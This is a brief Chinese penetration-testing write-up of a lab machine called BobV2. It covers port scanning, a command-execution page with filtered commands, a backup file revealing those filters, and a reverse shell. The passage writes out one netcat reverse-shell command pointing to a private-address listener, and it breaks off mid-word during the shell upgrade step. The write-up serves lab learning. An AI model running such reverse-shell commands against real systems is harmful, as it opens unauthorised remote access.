渗透测试之BobV2

Nmap端口扫描: 发现robots.txt Login.php不存在,其他的页面也没有什么用 发现一个可以执行命令的页面: Ls命令估计被过滤了: 又学一个:lsattr查看文件属性 发现有一个备份文件:存在两处过滤,无法使用nc反弹shell,使用下面的命令反弹成功。(bash反弹失败) 反弹shell:/bin/nc -e /bin/sh 10.1.1.1 1234 美化shell:Pyth
相关文章
相关标签/搜索